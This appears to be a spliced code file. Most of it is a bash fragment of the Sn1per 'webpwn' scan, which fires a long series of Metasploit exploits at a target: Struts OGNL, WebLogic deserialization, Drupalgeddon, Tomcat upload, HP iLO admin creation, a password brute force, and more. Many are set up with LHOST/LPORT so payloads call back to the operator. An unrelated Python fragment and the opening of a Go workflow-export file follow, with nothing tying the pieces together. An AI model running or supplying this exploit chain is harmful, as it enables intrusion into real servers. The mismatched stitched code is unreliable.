msfconsole -q -x "use scanner/http/apache_optionsbleed; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING HP ILO AUTH BYPASS EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use admin/hp/hp_ilo_create_admin_account; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-hp_ilo_create_admin_account.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-hp_ilo_create_admin_account.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-hp_ilo_create_admin_account.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-hp_ilo_create_admin_account.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING ELASTICSEARCH DYNAMIC SCRIPT JAVA INJECTION EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use exploit/multi/elasticsearch/script_mvel_rce; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-script_mvel_rce.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-script_mvel_rce.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-script_mvel_rce.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-script_mvel_rce.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING DRUPALGEDDON HTTP PARAMETER SQL INJECTION CVE-2014-3704 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use exploit/multi/http/drupal_drupageddon; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; setg URI /drupal/; setg TARGETURI /drupal/; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING MS15-034 HTTP.SYS MEMORY LEAK EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use scanner/http/ms15_034_http_sys_memory_dump; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING GLASSFISH ADMIN TRAVERSAL EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use scanner/http/glassfish_traversal; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-glassfish_traversal.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-glassfish_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-glassfish_traversal.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-glassfish_traversal.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING BADBLUE PASSTHRU METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use exploit/windows/http/badblue_passthru; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; set RPORT "$PORT"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-badblue_passthru.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-badblue_passthru.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-badblue_passthru.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-badblue_passthru.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING PHP CGI ARG INJECTION METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use exploit/multi/http/php_cgi_arg_injection; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; set RPORT "$PORT"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING PHPMYADMIN METASPLOIT EXPLOITS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg RHOST "$TARGET"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/htp/phpmyadmin_preg_replace; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING AXIS2 ADMIN BRUTE FORCE SCANNER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use scanner/http/axis_login; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg RHOST "$TARGET"; setg USERNAME admin; setg PASS_FILE "$PASS_FILE"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-axis_login.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-axis_login.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-axis_login.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-axis_login.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING AXIS2 AUTHENTICATED DEPLOYER RCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use multi/http/axis2_deployer; setg RHOSTS "$TARGET"; set FingerprintCheck false; setg RPORT "$PORT"; setg RHOST "$TARGET"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-axis2_deployer.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-axis2_deployer.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-axis2_deployer.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-axis2_deployer.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING JOOMLA COMFIELDS SQL INJECTION METASPLOIT CVE-2017-8917 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use unix/webapp/joomla_comfields_sqli_rce; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; set RPORT "$PORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING WORDPRESS REST API CONTENT INJECTION CVE-2017-5612 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use auxiliary/scanner/http/wordpress_content_injection; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; set RPORT "$PORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING ORACLE WEBLOGIC WLS-WSAT DESERIALIZATION RCE CVE-2017-10271 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use exploit/multi/http/oracle_weblogic_wsat_deserialization_rce; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; set RPORT "$PORT"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING APACHE STRUTS JAKARTA OGNL INJECTION CVE-2017-5638 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use multi/http/struts2_content_type_ognl; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; set TARGETURI /orders/3; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING APACHE STRUTS 2 SHOWCASE OGNL RCE CVE-2017-9805 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use exploit/multi/http/struts2_rest_xstream; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; set TARGETURI /orders/3; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING APACHE STRUTS 2 REST XSTREAM RCE CVE-2017-9791 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use exploit/multi/http/struts2_code_exec_showcase; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; set TARGETURI /orders/3; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING APACHE TOMCAT CVE-2017-12617 RCE EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use exploit/multi/http/tomcat_jsp_upload_bypass; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING APACHE STRUTS 2 NAMESPACE REDIRECT OGNL INJECTION CVE-2018-11776 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use exploit/multi/http/struts2_namespace_ognl; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED CISCO ASA TRAVERSAL CVE-2018-0296 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use auxiliary/scanner/http/cisco_directory_traversal; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING DRUPALGEDDON2 CVE-2018-7600 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use exploit/unix/webapp/drupal_drupalgeddon2; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; setg URI /drupal/; setg TARGETURI /drupal/; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING ORACLE WEBLOGIC SERVER DESERIALIZATION RCE CVE-2018-2628 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use exploit/multi/misc/weblogic_deserialize; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING OSCOMMERCE INSTALLER RCE CVE-2018-2628 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use exploit/multi/http/oscommerce_installer_unauth_code_exec; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING DRUPAL REST UNSERIALIZE CVE-2019-6340 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use unix/webapp/drupal_restws_unserialize; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; setg URI /drupal/; setg TARGETURI /drupal/; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_restws_unserialize.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_restws_unserialize.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_restws_unserialize.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_restws_unserialize.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING JAVA RMI SCANNER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use auxiliary/scanner/misc/java_rmi_server; setg RHOSTS \"$TARGET\"; set RPORT \"$PORT\"; run; back; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-java_rmi_server.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-java_rmi_server.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-java_rmi_server.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-java_rmi_server.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING PULSE SECURE VPN ARBITRARY FILE DISCLOSURE EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use gather/pulse_secure_file_disclosure; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-pulse_secure_file_disclosure.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-pulse_secure_file_disclosure.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-pulse_secure_file_disclosure.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-pulse_secure_file_disclosure.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING CITRIX GATEWAY ARBITRARY CODE EXECUTION VULNERABILITY CVE-2019-19781 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
curl -vk --path-as-is https://$TARGET/vpn/../vpns/ 2>&1 | grep "You don’t have permission to access /vpns/" >/dev/null && echo "VULNERABLE: $TARGET" | tee $LOOT_DIR/output/cve-2019-19781-$TARGET-port$PORT.txt || echo "MITIGATED: $TARGET" | tee $LOOT_DIR/output/cve-2019-19781-$TARGET-port$PORT.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Finished Sn1per webpwn scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
|
with open('../cities.txt') as f:
my_list = []
|
<gh_stars>0
package workflow
import (
"context"
"fmt"
"github.com/go-gorp/gorp"
"github.com/ovh/cds/engine/api/application"
"github.com/ovh/cds/engine/api/cache"
"github.com/ovh/cds/engine/api/environment"
"github.com/ovh/cds/engine/api/observability"
"github.com/ovh/cds/sdk"
"github.com/ovh/cds/sdk/exportentities"
v2 "github.com/ovh/cds/sdk/exportentities/v2"
)
// Export a workflow
func Export(ctx context.Context, db gorp.SqlExecutor, cache cache.Store, proj sdk.Project, name string, opts ...v2.ExportOptions) (exportentities.Workflow, error) {
ctx, end := observability.Span(ctx, "workflow.Export")
defer end()
wf, err := Load(ctx, db, cache, proj, name, LoadOptions{})
if err != nil {
return v2.Workflow{}, sdk.WrapError(err, "cannot load workflow %s", name)
}
// If repo is from as-code do not export WorkflowSkipIfOnlyOneRepoWebhook
if wf.FromRepository != "" {
opts = append(opts, v2.WorkflowSkipIfOnlyOneRepoWebhook)
}
wkf, err := exportentities.NewWorkflow(ctx, *wf, opts...)
if err != nil {
return v2.Workflow{}, sdk.WrapError(err, "unable to export workflow")
}
return wkf, nil
}
// Pull a workflow with all it dependencies; it writes a tar buffer in the writer
